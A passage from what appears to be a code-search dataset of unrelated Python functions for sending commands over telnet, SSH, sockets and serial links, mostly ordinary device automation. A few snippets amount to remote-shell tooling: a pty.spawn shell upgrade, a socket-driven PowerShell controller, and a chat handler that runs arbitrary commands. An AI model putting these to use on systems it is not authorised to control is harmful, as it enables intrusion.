telnetlib.Telnet(self.host, port=23, timeout=1)\n except:\n screen_buffer = 'none'\n result = {'host': self.host, 'conn_type': 'telnet', 'result': 0, 'screen_buffer': screen_buffer}\n return result\n else:\n # login\n # username info\n if LOGIN_LOG:\n # time.sleep(log_sleep_time)\n output = output + tn.read_until(prompt_usr, timeout).decode('ascii')\n else:\n tn.read_until(prompt_usr, timeout)\n tn.write(self.usr.encode(\"ascii\") + b'\\n')\n # password info\n if self.pwd:\n if LOGIN_LOG:\n output = output + tn.read_until(prompt_pwd, timeout).decode('ascii')\n else:\n tn.read_until(prompt_pwd, timeout)\n tn.write(self.pwd.encode(\"ascii\") + b'\\n')\n else:\n tn.read_until(prompt_pwd, timeout)\n tn.write(b'\\n')\n # login info\n if LOGIN_LOG:\n # time.sleep(log_sleep_time)\n output = output + tn.read_until(prompt_ena, timeout).decode('ascii')\n else:\n tn.read_until(prompt_ena, timeout + 1)\n tn.write(b'\\n') # make the first command in prompt\n # run cmd_list\n for cmd in cmd_list:\n tn.write(cmd.encode(\"ascii\") + b'\\n')\n time.sleep(0.5)\n output = output + tn.read_very_eager().decode('ascii')\n # tn.read_until(prompt_conf, timeout)\n\n screen_buffer = output\n tn.close()\n\n result = {'host': self.host, 'conn_type': 'telnet', 'result': 1, 'screen_buffer': screen_buffer}\n return result", "def run_command(self, command):\n # Put the command in a nice byte-encoded variable\n full_command = command.encode('ascii') + b'\\n'\n # Write out the command to telnet\n self.tn.write(full_command)\n # Get the command output, decode it, and split out the junk\n command_output = self.tn.read_until(b'> ').decode('ascii').split('\\r\\n')[:-1]\n # Raise command error if VLC does not recognize the command.\n if command_output != []:\n command_error = re.match(r\"Error in.*\", command_output[0])\n if re.match(\"Unknown command `.*'\\. 
Type `help' for help\\.\", command_output[0]):\n raise CommandError(\"Unkown Command\")\n elif command_error:\n raise LuaError(command_error.group())\n # Return the split output of the command\n return command_output", "def telnet(shell='/bin/bash'):\n assert(sys.stdin.isatty())\n c.setVerbose(False)\n\n # Open a PTY and spawn a bash connected to the slave end on the remote side\n code = 'import pty; pty.spawn([\\'{}\\', \\'-i\\'])'.format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...\n # Should maybe put some more functionality into the inline python code instead.\n\n # Save current TTY settings\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n\n # Put TTY into raw mode\n tty.setraw(sys.stdin)\n\n # Resize remote terminal\n # Nice-to-have: also handle terminal resize\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n') # terminal echo\n recvtil('READY\\r\\n') # command output\n\n interact()\n\n # Restore previous settings\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)", "async def send_commandTelnet(self, cmd, pattern=None, timeout=None):\n\n # Debug info message\n log.info(\"send_commandTelnet\")\n\n # Default value of timeout variable\n if timeout is None:\n timeout = self.timeout\n\n # Add carriage return at the end of the command (mandatory to send the command)\n cmd = cmd + \"\\n\"\n\n # Sending command\n self._writer.write(cmd.encode())\n\n # Temporary string variable\n output = \"\"\n\n # Temporary bytes variable\n byte_data = b\"\"\n\n try:\n\n # Read data\n while True:\n\n # Read returned prompt\n byte_data += await asyncio.wait_for(\n self._reader.read(MAX_BUFFER_DATA), timeout=timeout\n )\n\n # Display info message\n log.info(f\"send_commandTelnet: byte_data: '{byte_data}'\")\n\n # Temporary convertion in string. 
This string has the following form: \"b'....'\"\n output = str(byte_data)\n\n # Display info message\n log.info(f\"send_commandTelnet: output: '{output}'\")\n\n # Is a patten used?\n if pattern:\n\n # Use pattern instead of prompt\n if pattern in output:\n\n # Yes\n\n # Leave the loop\n break\n\n else:\n\n # Check if prompt is found\n if self.check_if_prompt_is_found(output):\n\n # Yes\n\n # Leave the loop\n break\n\n except asyncio.TimeoutError:\n\n # Time out during when reading prompt\n\n # Display error message\n log.error(\"send_commandTelnet: connection: timeout\")\n\n # Exception propagation\n raise\n\n except Exception as error:\n\n # Error during when reading prompt\n\n # Display error message\n log.error(f\"send_commandTelnet: error: {error}\")\n\n # Exception propagation\n raise\n\n # Convert data (bytes) into string\n output = byte_data.decode(\"utf-8\", \"ignore\")\n\n # Debug info message\n log.debug(\n f\"send_commandTelnet: raw output: '{output}'\\nsend_commandTelnet: raw output (hex): '{output.encode().hex()}'\"\n )\n\n # Remove the command sent from the result of the command\n output = self.remove_command_in_output(output, str(cmd))\n # Remove the carriage return of the output\n output = self.remove_starting_carriage_return_in_output(output)\n # Remove the ending prompt of the output\n output = self.remove_ending_prompt_in_output(output)\n\n # Debug info message\n log.debug(\n f\"send_commandTelnet: cleaned output: '{output}'\\nsend_commandTelnet: cleaned output (hex): '{output.encode().hex()}'\"\n )\n\n # Check if there is an error in the output string (like \"% Unrecognized command\")\n # and generate an exception if needed\n self.check_error_output(output)\n\n # Return the result of the command\n return output", "def telnet1(node):\n if len(node) == 2:\n # we received env and node name\n env = node[0]\n running = helpers.check_sim_running(env)\n node = node[1]\n elif len(node) == 1:\n # assume default env\n env = \"default\"\n running = helpers.check_sim_running(env)\n node = node[0]\n else:\n exit(call([get_command(), \"telnet\", \"--help\"]))\n\n if running:\n sim_name = running\n server = VIRLServer()\n details = server.get_sim_roster(sim_name)\n\n if node:\n try:\n node_dict = get_node_from_roster(node, details)\n node_name = node_dict.get(\"NodeName\")\n ip = node_dict[\"managementIP\"]\n proxy = node_dict.get(\"managementProxy\")\n\n # use user specified telnet command\n if \"VIRL_TELNET_COMMAND\" in server.config:\n cmd = server.config[\"VIRL_TELNET_COMMAND\"]\n cmd = cmd.format(host=ip)\n print(\"Calling user specified command: {}\".format(cmd))\n exit(call(cmd.split()))\n\n if proxy == \"lxc\":\n lxc = get_mgmt_lxc_ip(details)\n click.secho(\"Attemping telnet connection\" \" to {} at {} via ssh {}\".format(node_name, ip, lxc))\n cmd = 'ssh -t {}@{} \"telnet {}\"'\n cmd = cmd.format(server.user, lxc, ip)\n\n exit(call(cmd, shell=True))\n else:\n # handle the \"flat\" networking case\n click.secho(\"Attemping telnet connection\" \" to {} at {}\".format(node_name, ip))\n exit(call([\"telnet\", ip]))\n\n except AttributeError:\n click.secho(\"Could not find management info \" \"for {}:{}\".format(env, node), fg=\"red\")\n\n except KeyError:\n click.secho(\"Unknown node {}:{}\".format(env, node), fg=\"red\")\n else:\n return details.json()", "def SendCmd(self, command):\r\n if not self.__CheckConnectStatus():\r\n print \"Non telnet connection!\"\r\n return False\r\n\r\n if command == None or command == False:\r\n print \"No valid command to run.\"\r\n return 
True\r\n else:\r\n command = str(command) + \"\\r\\n\"\r\n print self.prompt + command\r\n \r\n try:\r\n self.tn.read_very_eager() \r\n self.tn.write(command)\r\n p_Output = self.tn.read_until(self.prompt, self.timeout)\r\n print p_Output\r\n return p_Output\r\n\r\n except:\r\n print \"Write command failure\"\r\n return False", "def telnet():\r\n print('''\\n%s at %s acting as user %s\r\n\\nTelnet Service Menu''' % (PACKETMASTER.model, ADDRESS, USERNAME))\r\n choice = moves.input('''\r\n 1 - Get current Telnet status\r\n 2 - Enable or Disable Telnet service\r\n 3 - Back\r\n 4 - Quit \\n\r\n Enter selection number: ''')\r\n try:\r\n choice = int(choice)\r\n except ValueError as reason:\r\n print(\"That is not a valid selection.\", reason)\r\n telnet()\r\n execute = {1: PACKETMASTER.get_telnet,\r\n 2: PACKETMASTER.set_telnet_guided,\r\n 3: hardwareconfig,\r\n 4: exit}\r\n if choice in execute:\r\n try:\r\n select = execute[choice]\r\n run = select()\r\n print(run)\r\n telnet()\r\n except KeyError as reason:\r\n print(reason)\r\n else:\r\n print(\"That is not a valid selection.\")\r\n telnet()", "def run(self, cmdline):\n self.send(cmdline+\"\\n\")\n rdata = '\\n'.join(self.recv_to_prompt())\n return rdata", "def cmd(self, command):\n self.enode.get_shell('bash').send_command(command, matches=self.scapy_prompt)\n response = self.enode.get_shell('bash').get_response()\n return response", "def do_command(command):\n send_command(command)\n response = get_response()\n print(\"Rcvd: <<< \\n\" + response)\n return response", "def telnet(node):\n server = VIRLServer()\n client = get_cml_client(server)\n\n current_lab = get_current_lab()\n if current_lab:\n lab = safe_join_existing_lab(current_lab, client)\n if lab:\n try:\n node_obj = lab.get_node_by_label(node)\n except NodeNotFound:\n click.secho(\"Node {} was not found in lab {}\".format(node, current_lab), fg=\"red\")\n exit(1)\n\n if node_obj.is_active():\n mgmtip = get_node_mgmt_ip(node_obj)\n if mgmtip:\n if \"VIRL_TELNET_COMMAND\" in server.config:\n cmd = server.config[\"VIRL_TELNET_COMMAND\"]\n cmd = cmd.format(host=mgmtip)\n print(\"Calling user specified command: {}\".format(cmd))\n exit(call(cmd.split()))\n else:\n click.secho(\"Attemping telnet connection to {} at {}\".format(node_obj.label, mgmtip))\n\n exit(call([\"telnet\", mgmtip]))\n else:\n click.secho(\"Node {} does not have an external management IP\".format(node_obj.label))\n else:\n click.secho(\"Node {} is not active\".format(node_obj.label), fg=\"yellow\")\n else:\n click.secho(\"Unable to find lab {}\".format(current_lab), fg=\"red\")\n exit(1)\n else:\n click.secho(\"No current lab set\", fg=\"red\")\n exit(1)", "def issue(self, cmd):\n self.send([cmd])\n return self.read_until_prompt()[1:] # drop the echo", "def run_cmd(server, client):\n msg = [client.get_command()]\n client.input_list += msg\n server.logger.info(\"RECEIVED INPUT {} : {}\".format(client.ip, msg[0]))\n if not client.username or not client.password:\n server.login_screen(client, msg)\n return\n loop_cmds(server, client, msg[0].split(';'))\n server.return_prompt(client)", "def cmd(self, command, timeout = 60):\n retstr = \"\"\n\t#log.debug(\"%s\"%command)\n\tlog.cmd(command)\n try:\n\t self.ses.delaybeforesend = 0.5\n self.ses.sendline(command)\n self.ses.expect(ixia_prompt_regex, timeout)\n\t #log.info(\"before %s; after %s\" %(self.ses.before, self.ses.after))\n retstr += self.ses.before\n except TIMEOUT:\n misc.TestError(\"Timeout in Ixia.cmd for command %s\\n\" % command)\n return 
retstr.strip().splitlines()[-1]", "def handle_telnet_cmd(self, telnet_cmd):\n print(\"Telnet cmd: {}\".format(telnet_cmd))\n # termious hack\n if self.termious is None:\n if len(telnet_cmd) == 8:\n if telnet_cmd[0] == 250 and telnet_cmd[1] == 31:\n self.termious = True\n if len(telnet_cmd) == 2:\n if telnet_cmd[0] == 251 and telnet_cmd[1] == 31:\n self.termious = False", "def do_cmd(cmd,sock):\n\n buffer = ''\n \n # Write the command and wait one second.\n print 'writing command '+cmd \n sock.send(cmd+SBE37_NEWLINE)\n time.sleep(1)\n \n # Block to receive all data.\n # Continue reading if the received data does not include a prompt.\n # Break out when the received data ends in a prompt.\n while True:\n try:\n data = ''\n data = sock.recv(1024)\n buffer += data\n except:\n raise\n else:\n #print 'received '+str(len(data))+' bytes' \n if buffer.endswith(SBE37Prompt.COMMAND):\n break\n elif buffer.endswith(SBE37Prompt.AUTOSAMPLE):\n break\n elif buffer.endswith(SBE37Prompt.BAD_COMMAND):\n break\n\n return buffer", "def run_cli(self, command=None):\n if command is None:\n return \"FAILURE\"\n\n conn_expect = self.get_expect_connection()\n expect = ['bytes*', '>']\n response = conn_expect.request(\"read_until_prompt\",\n command,\n expect,\n None)\n if response is 'FAILURE':\n return 'FAILURE'\n\n return response", "def do_command(command):\n send_command(command)\n # time.sleep(0.1) # may be required on slow machines\n response = get_response()\n print(\"Rcvd: <<< \" + response)\n return response", "def do(self, command):\r\n command += xsct_line_end\r\n logger.info('Sending command: %s ...', repr(command))\r\n self.send(command)\r\n ans = self.recv()\r\n if ans.startswith('okay'):\r\n return ans[5:]\r\n if ans.startswith('error'):\r\n raise PyXilException(ans[6:])\r\n raise PyXilException('Illegal start-string in protocol. Answer is: ' + ans)", "def send_telnet_command(self, cmd):\n data = bytes(cmd)\n self.send_to_client(data)", "def get_command():\n tcflush(sys.stdin, TCIFLUSH)\n command = input(\"\\nEnter a command\\n>>> \")\n return command", "async def terminal(event):\r\n command = utils.raw(event.message)\r\n await event.edit(f\"**Running command:**\\n`{command}`\")\r\n result = subprocess.getoutput(command)\r\n await event.edit(f\"**Running command:**\\n`{command}`\\n**Result:**\\n`{result}`\")", "async def _run_command(self, cmd, timeout=None, prompt_re=None):\n if not self._connected:\n raise RuntimeError(\n \"Not Connected\", \"status: %r\" % self.exit_status, self.key\n )\n\n # Ideally there should be no data on the stream. We will in any case\n # drain any stale data. This is mostly for debugging and making sure\n # that we are in sane state\n stale_data = await self._stream_reader.drain()\n if len(stale_data) != 0:\n self.logger.warning(\"Stale data on session: %s\", stale_data)\n\n output = []\n\n commands = cmd.splitlines()\n for command in commands:\n cmdinfo = self._devinfo.get_command_info(\n command, self._opts.get(\"command_prompts\")\n )\n\n self.logger.info(\"RUN: %r\", cmdinfo.cmd)\n\n # Send any precmd data (e.g. 
\\x15 to clear the commandline)\n if cmdinfo.precmd:\n self._stream_writer.write(cmdinfo.precmd)\n\n self._stream_writer.write(cmdinfo.cmd)\n\n try:\n prompt = prompt_re or cmdinfo.prompt_re\n\n resp = await asyncio.wait_for(\n self._wait_response(command, prompt),\n timeout or self._devinfo.vendor_data.cmd_timeout_sec,\n loop=self._loop,\n )\n output.append(self._format_output(command, resp))\n except asyncio.TimeoutError:\n self.logger.error(\"Timeout waiting for command response\")\n data = await self._stream_reader.drain()\n raise RuntimeError(\"Command Response Timeout\", data[-200:])\n\n return b\"\\n\".join(output).rstrip()", "def query(self, *parameters):\n telnet = telnetlib.Telnet(self.host, self.port)\n if self._username and self._password:\n telnet.write('login {username} {password}\\n'.format(\n username=self._username,\n password=self._password).encode('UTF-8'))\n telnet.read_until(b'\\n', timeout=3)\n message = '{}\\n'.format(' '.join(parameters))\n telnet.write(message.encode('UTF-8'))\n response = telnet.read_until(b'\\n', timeout=3)\\\n .decode('UTF-8')\\\n .split(' ')[-1]\\\n .strip()\n telnet.write(b'exit\\n')\n return urllib.parse.unquote(response)", "def query(self, command):\r\n self.ser_io.write(command+'\\r')\r\n return self.ser_io.readline()", "def telnet(self):\n self.log.info(\"connect-via-telnet\")\n telnet = distutils.spawn.find_executable(\"telnet\")\n os.execv(telnet, (\"telnet\", \"localhost\", str(self.qemu.monitor_port)))", "def connect(host: str, port: int):\n print('Connecting to the server...')\n print(cmd.RESP_OK, type(cmd.RESP_OK))\n tn = telnetlib.Telnet(host = host, port = port)\n code, params = cmd.serv_read_resp(tn)\n if code != cmd.RESP_OK:\n print(f'Connection problem. {code, params}')\n exit(0)\n print(f'{params[0]}\\n')\n return tn", "def run(self, cmd, exp='', timeout=60):\n if not self.connected(): return (False, list())\n\n clist = cmd.split()\n\n # disable paing and echo would simplify parsing\n self.set_paging_status(False)\n self.set_echo_status(False)\n\n # do not allow paging and echo and prompt command\n if clist[0] == 'paging' or clist[0] == 'echo' or clist[0] == 'prompt':\n return (True, list())\n\n\n if not exp:\n # prompt will be inserted by middle commands, so replace with '.*'\n exp = [(self.prompt[:-2] + '.*# ').encode('ascii')]\n\n if not isinstance(exp, list):\n exp = [exp]\n\n # capture this if paging status is enabled by user command unexpectedly\n exp.append(br'more\\? y=\\[yes\\] q=\\[quit\\].*')\n\n try:\n self.write(cmd + '\\n')\n res = list()\n while True:\n resp = self.tn.expect(exp, timeout)\n if resp[0] == -1:\n sys.stderr.write(self.ne + \": \" + cmd + \" no resp\\n\")\n return (False, list())\n elif resp[0] == (len(exp) - 1): # paging\n # remove the the tailline(which is paging indication) \n res += resp[2].decode('ascii').splitlines()[:-1]\n self.write(b'y')\n else:\n res += resp[2].decode('ascii').splitlines()\n break\n except:\n sys.stderr.write(self.ne + \": \" + cmd + \" FAIL\\n\")\n self.close()\n return (False, list())\n\n # remove tailline(which is prompt)\n return (True, list(filter(None, res[:-1])))", "async def interactive_shell():\n # Create Prompt.\n session = PromptSession('Say something: ')\n\n # Run echo loop. 
Read text from stdin, and reply it back.\n while True:\n try:\n result = await session.prompt(async_=True)\n print('You said: \"{0}\"'.format(result))\n except (EOFError, KeyboardInterrupt):\n return", "async def interactive_shell(self) -> None:\n session = PromptSession()\n while True:\n try:\n result = await session.prompt_async(f\"redCisco> \", style=style)\n if not result:\n continue\n await self.command_interpreter(str(result).strip())\n except (EOFError, KeyboardInterrupt):\n break", "def command(s_socket):\r\n command = raw_input(\"#> \")\r\n bytes_value = to_bytes(len(command) + 5, 4, 'little')\r\n s_socket.send('c' + bytes_value + command)\r\n\r\n print(s_socket.recv(MAX_BUFFER_LENGTH))", "def command(cmd: str) -> str:\n with MCRcon(SERVERADDRESS, PASSWORD) as mcr:\n response = mcr.command(cmd)\n return response", "async def repl(self, ctx):\n variables = {\n 'ctx': ctx,\n 'bot': self.bot,\n 'message': ctx.message,\n 'guild': ctx.guild,\n 'channel': ctx.channel,\n 'author': ctx.author,\n '_': None,\n }\n\n if ctx.channel.id in self.sessions:\n await ctx.send('Already running a REPL session in this channel. Exit it with `quit`.')\n return\n\n self.sessions.add(ctx.channel.id)\n await ctx.send('Enter code to execute or evaluate. `exit()` or `quit` to exit.')\n\n def check(m):\n return m.author.id == ctx.author.id and \\\n m.channel.id == ctx.channel.id and \\\n m.content.startswith('`')\n\n while True:\n try:\n response = await self.bot.wait_for('message', check=check, timeout=10.0 * 60.0)\n except asyncio.TimeoutError:\n await ctx.send('Exiting REPL session.')\n self.sessions.remove(ctx.channel.id)\n break\n\n cleaned = self.cleanup_code(response.content)\n\n if cleaned in ('quit', 'exit', 'exit()'):\n await ctx.send('Exiting.')\n self.sessions.remove(ctx.channel.id)\n return\n\n executor = exec\n if cleaned.count('\\n') == 0:\n # single statement, potentially 'eval'\n try:\n code = compile(cleaned, '<repl session>', 'eval')\n except SyntaxError:\n pass\n else:\n executor = eval\n\n if executor is exec:\n try:\n code = compile(cleaned, '<repl session>', 'exec')\n except SyntaxError as e:\n await ctx.send(self.get_syntax_error(e))\n continue\n\n variables['message'] = response\n\n fmt = None\n stdout = io.StringIO()\n\n try:\n with contextlib.redirect_stdout(stdout):\n result = executor(code, variables)\n if inspect.isawaitable(result):\n result = await result\n except Exception as e:\n value = stdout.getvalue()\n fmt = f'```py\\n{value}{traceback.format_exc()}\\n```'\n else:\n value = stdout.getvalue()\n if result is not None:\n fmt = f'```py\\n{value}{result}\\n```'\n variables['_'] = result\n elif value:\n fmt = f'```py\\n{value}\\n```'\n\n try:\n if fmt is not None:\n if len(fmt) > 2000:\n await ctx.send('Content too big to be printed.')\n else:\n await ctx.send(fmt)\n except discord.Forbidden:\n pass\n except discord.HTTPException as e:\n await ctx.send(f'Unexpected error: `{e}`')", "def enter_repl(self):\n text_input = ''\n while True:\n text_input = input('>>')\n if text_input == 'exit':\n break\n #An alias for querying an instrument error string\n elif text_input == 'err?':\n self.write_to_serial(':SYST:ERR?')\n print(self.read_from_serial())\n else:\n self.write_to_serial(text_input)\n print(self.read_from_serial())", "def send_command(self, command):\r\n\r\n connection = self.establish_connection()\r\n connection.send(command + '\\n')\r\n print command\r\n output = connection.recv(1000)\r\n return output", "def SendCmdWithKeyWord(self, command, RetKeyword):\r\n if not 
self.__CheckConnectStatus():\r\n print \"Non telnet connection!\"\r\n return False\r\n\r\n if command == None or command == False:\r\n print \"No valid command to run.\"\r\n return True\r\n else:\r\n command = str(command) + \"\\r\\n\"\r\n print self.prompt + command\r\n \r\n try:\r\n self.tn.read_very_eager()\r\n self.tn.write(command)\r\n p_Output = self.tn.read_until(RetKeyword, self.timeout)\r\n print p_Output\r\n return p_Output\r\n\r\n except:\r\n print \"Write command failure\"\r\n return False", "def run(self, cmd, timeout=30, exitcode=True):\n result = False\n self.write(cmd)\n stdout = self.stdout_read(timeout)\n\n if exitcode:\n self.write(\"echo $?\".format(cmd))\n rc = self.stdout_read(timeout)\n if re.search(r\"\\r\\n0\\r\\n\", rc, re.MULTILINE):\n result = True\n elif stdout is not None and stdout != \"\":\n result = True\n return result, stdout", "def get_response(command):\n connection = get_client()\n\n connection.send(command)\n\n data = connection.recv()\n connection.close()\n\n return data", "def sendCommand(self,command): \r\n \r\n try:\r\n stdin,stdout,stderr=ssh.exec_command(command)\r\n feedback= '*** Command is sent***'\r\n return feedback,stdin,stdout,stderr\r\n except Exception as e :\r\n print '***Command sending failed :'+str(e)+'***'\r\n sys.exit(1)", "def telnet_login(self, **kwargs):\n raise NotImplementedError", "def _send_command(self, command):\n command = \"%s\\n\" % (command.strip())\n self.server.write(command)\n self.server.flush()\n\n #read the length of the result\n length = int(self.server.readline())\n output = self.server.read(length)\n\n result = pickle.loads(output)\n if result[0] == 'ok':\n return result[1]\n else:\n raise RobotCommandError(str(result))", "def send_command(self, data):\n try:\n self.write(data)\n reply = self.read_line()\n \n if reply == \"{}\":\n pass\n else:\n print \"send_command: received bad reply %s\" % (reply)\n sys.exit(1)\n except Exception:\n raise", "def send_cmd(self):\n\n cmd = self.repl_input.get().encode()\n self.serial.write(cmd + b\"\\r\")\n self.repl_input.set(\"\")", "def test_direct_access_telnet_mode(self):\n self.assert_enter_command_mode()\n\n # go into direct access\n self.assert_direct_access_start_telnet(timeout=600)\n self.tcp_client.send_data(\"#D\\r\\n\")\n if not self.tcp_client.expect(\"\\r\\n\"):\n self.fail(\"test_direct_access_telnet_mode: did not get expected response\")\n \n self.assert_direct_access_stop_telnet()", "def __alt_prompt(self, prompt_text: str):\r\n if self.__use_windows_prompt:\r\n sys.stdout.write(prompt_text)\r\n sys.stdout.flush()\r\n i = sys.stdin.readline()\r\n return i.strip()\r\n return input(prompt_text)", "def acceptComm():\r\n\tcommand = input(\"Enter a number: \")\r\n\tif command in COMMANDS:\r\n\t\treturn command\r\n\telse: \r\n\t\tprint(\"ERROR: Command NOT Recognized\")\r\n\t\treturn acceptComm()", "def telnet_console_port(self):\n logging.info('Telnet to console port with ip %s and port %s',self.console_ip, self.act_port)\n console = pexpect.spawn('telnet %s %s' % (self.console_ip, self.act_port))\n console.logfile = self.log\n console.sendline('')\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, LOGIN_INCORRECT, \\\n 'Abort Auto Provisioning and continue.*', 'enable admin vdc.*', \\\n 'enforce secure password.*', 'the basic configuration dialog.*', \\\n 'the password for.*', LOADER_PROMPT, BOOT_PROMPT, BASH_SHELL, DEBUG_SHELL, \\\n SWITCH_LOGIN, PWD_PROMPT, SWITCH_PROMPT])\n while i >= 0:\n if i == 0:\n console.close()\n logging.info('telnet_console_port, 
Timed out, Not able to access console')\n raise TimeoutError('telnet_console_port, Timed out, Not able to access console')\n if i == 1:\n console.close()\n logging.info('telnet_console_port, Eof error, Not able to access console')\n raise EofError('telnet_console_port, Eof error, Not able to access console')\n if i == 2:\n console.close()\n logging.info('telnet_console_port, Password error')\n raise PasswordError('telnet_console_port, Password error')\n if i>2 and i<8:\n console.close()\n logging.info(\"telnet_console_port, switch is booting so load and check\")\n raise BootingError(\"telnet_console_port, switch is booting so load and check\")\n if i == 8 or i == 9:\n console.close()\n logging.info('telnet_console_port, Switch in loader/boot prompt')\n raise LoaderError('telnet_console_port, Switch in loader/boot prompt')\n if i == 10 or i == 11:\n console.sendline('exit')\n if i == 12:\n console.sendline('admin')\n if i == 13:\n console.sendline(self.switch_pwd)\n if i == 14:\n break\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, LOGIN_INCORRECT, \\\n 'Abort Auto Provisioning and continue.*', 'enable admin vdc.*', \\\n 'enforce secure password.*', 'the basic configuration dialog.*', \\\n 'the password for.*', LOADER_PROMPT, BOOT_PROMPT, BASH_SHELL, DEBUG_SHELL, \\\n SWITCH_LOGIN, PWD_PROMPT, SWITCH_PROMPT], 5)\n \n return console", "def cmd(self, cmd, verbose=None, timeout=120, listformat=False):\n \n if verbose is None:\n verbose = self.verbose\n \n cmd = str(cmd)\n t = None #used for timer \n start = time.time()\n output = []\n if verbose:\n self.debug( \"[\" + self.username +\"@\" + str(self.host) + \"]# \" + cmd)\n try:\n tran = self.connection.get_transport()\n chan = tran.open_session()\n chan.get_pty()\n f = chan.makefile()\n t = Timer(timeout, self.ssh_sys_timeout,[chan, start,cmd] )\n t.start()\n chan.exec_command(cmd)\n if ( listformat is True):\n #return output as list of lines\n output = f.readlines()\n else:\n #return output as single string buffer\n output = f.read()\n if verbose:\n self.debug(\"done with exec\")\n except CommandTimeoutException, cte: \n elapsed = str(time.time()-start).split('.')[0]\n self.debug(\"Command (\"+cmd+\") timed out after \" + str(elapsed) + \" seconds\\nException\") \n raise cte\n finally:\n if (t is not None):\n t.cancel() \n if verbose:\n elapsed = str(time.time()-start).split('.')[0]\n if (listformat is True):\n self.debug(\"\".join(output))\n else:\n self.debug(output)\n \n return output", "def exec_raw_no_follow(self, command) -> None:\n\n if isinstance(command, bytes):\n command_bytes = command\n else:\n command_bytes = bytes(command.encode(\"utf-8\"))\n\n # check we have a prompt\n data = self.read_until(1, b\">\")\n if not data.endswith(b\">\"):\n raise PyboardError(\"could not enter raw repl 5\")\n\n if self.use_raw_paste:\n # Try to enter raw-paste mode.\n self.con.write(b\"\\x05A\\x01\")\n data = self.con.read(2)\n if data == b\"R\\x00\":\n # Device understood raw-paste command but doesn't support it.\n pass\n elif data == b\"R\\x01\":\n # Device supports raw-paste mode, write out the command using this mode.\n return self.raw_paste_write(command_bytes)\n else:\n # Device doesn't support raw-paste, fall back to normal raw REPL.\n data = self.read_until(1, b\"w REPL; CTRL-B to exit\\r\\n>\")\n if not data.endswith(b\"w REPL; CTRL-B to exit\\r\\n>\"):\n print(data)\n raise PyboardError(\"could not enter raw repl\")\n # Don't try to use raw-paste mode again for this connection.\n self.use_raw_paste = False\n\n # write string\n 
debug(f'self.con.write \"{command_bytes}\"')\n self.con.write(command_bytes)\n\n # Alternative for write string above, do it in chuncks of max 256 bytes.\n # Write command using standard raw REPL, 256 bytes every 10ms.\n # for i in range(0, len(command_bytes), 256):\n # self.serial.write(command_bytes[i: min(i + 256, len(command_bytes))])\n # time.sleep(0.01)\n\n # Terminate command\n debug(r'self.con.write \"\\r\\x04\"')\n self.con.write(b\"\\x04\")\n\n # check if we could exec command\n data = self.read_until(2, b\"OK\", timeout=0.5)\n if data != b\"OK\":\n raise PyboardError(\"could not exec command (response: %r)\" % data)", "def shell(s_socket):\r\n shellname = \"powershell\"\r\n bytes_value = to_bytes(len(shellname), 4, 'little')\r\n s_socket.send('o' + bytes_value + shellname)\r\n value = raw_input(shellname + \"#> \")\r\n while True:\r\n bytes_value = to_bytes(len(value), 4, 'little')\r\n s_socket.send('s' + bytes_value + value)\r\n print(s_socket.recv(20000))\r\n\r\n if 'exit' in value:\r\n break\r\n\r\n value = raw_input(shellname + \"#> \")", "def askForCommand(self,command): \n\n\t\tcurrentCommand = 'Simple 2F Gripper Controller\\n-----\\nCurrent command:'\n\t\tcurrentCommand += ' rACT = ' + str(command.rACT)\n\t\tcurrentCommand += ', rGTO = ' + str(command.rGTO)\n\t\tcurrentCommand += ', rATR = ' + str(command.rATR)\n\t\tcurrentCommand += ', rPR = ' + str(command.rPR )\n\t\tcurrentCommand += ', rSP = ' + str(command.rSP )\n\t\tcurrentCommand += ', rFR = ' + str(command.rFR )\n\n\n\t\tprint currentCommand\n\n\t\tstrAskForCommand = '-----\\nAvailable commands\\n\\n'\n\t\tstrAskForCommand += 'r: Reset\\n'\n\t\tstrAskForCommand += 'a: Activate\\n'\n\t\tstrAskForCommand += 'c: Close\\n'\n\t\tstrAskForCommand += 'o: Open\\n'\n\t\tstrAskForCommand += '(0-255): Go to that position\\n'\n\t\tstrAskForCommand += 'f: Faster\\n'\n\t\tstrAskForCommand += 'l: Slower\\n'\n\t\tstrAskForCommand += 'i: Increase force\\n'\n\t\tstrAskForCommand += 'd: Decrease force\\n'\n\t\t\n\t\tstrAskForCommand += '-->'\n\n\t\treturn raw_input(strAskForCommand)\n\t\t#return raw_input(strAskForCommand)", "def run_pty(self, command):\r\n boto.log.debug('running:%s on %s' % (command, self.server.instance_id))\r\n channel = self._ssh_client.get_transport().open_session()\r\n channel.get_pty()\r\n channel.exec_command(command)\r\n return channel.recv(1024)", "def recv_to_prompt(self):\n buf = \"\"\n while True:\n ibuf = self._channel.recv(65536)\n buf += ibuf\n if ibuf.endswith(\"$ \") or ibuf.endswith(\"# \"):\n break\n\n lbuf = buf.splitlines()\n return lbuf[1:-1]", "def sendCmd(self, cmd, timeout=300, ignoreErrors=False,expected_param = \"]#\"):\n self.resetStream()\n\n cmd = cmd.strip()\n cmd = re.sub(r\"[\\r\\n\\t\\s]+\", \" \", cmd)\n try:\n available_data = self._session.read_nonblocking(size=1000, timeout=0.5) # Read all available output\n if re.search(\"logging out\", available_data, flags=re.I):\n logger.info(\"Logged out due to inactivity. 
Reconnecting..\")\n self.reconnect()\n except pexpect.TIMEOUT: pass\n\n self._session.sendline(cmd)\n\n self.last_output = \"\"\n while True:\n i = self._session.expect([self._prompt, pexpect.EOF, pexpect.TIMEOUT, \"logging out\", self.promptmore,expected_param], timeout=timeout)\n #print \"Value of i \" + str(i)\n if i == 0:\n # Prompt found\n self.last_match = self._session.match\n self.last_output += self._session.before\n break\n if i == 1:\n # EOF\n logger.error(\"Connection closed %s\" % self)\n raise ValueError(\"Connection Closed\")\n elif i == 2:\n # TIMEOUT\n logger.error(str(self._session))\n logger.error(\"Time Out\")\n raise ValueError(\"Time Out\")\n elif i == 3:\n logger.info(\"Logged out due to inactivity. Reconnecting..\")\n self.reconnect()\n self._session.sendline(cmd)\n continue\n elif i == 4:\n # More prompt. Send Space\n self.last_output += self._session.before\n self._session.send(\" \")\n continue\n elif i == 5:\n self.last_output = self._session.before\n break\n\n #logger.debug(\"Output Before Removing command: %s\" % self.last_output)\n #self.last_output = re.sub(\"(?m)\" + re.escape(cmd), \"\", self.last_output)\n 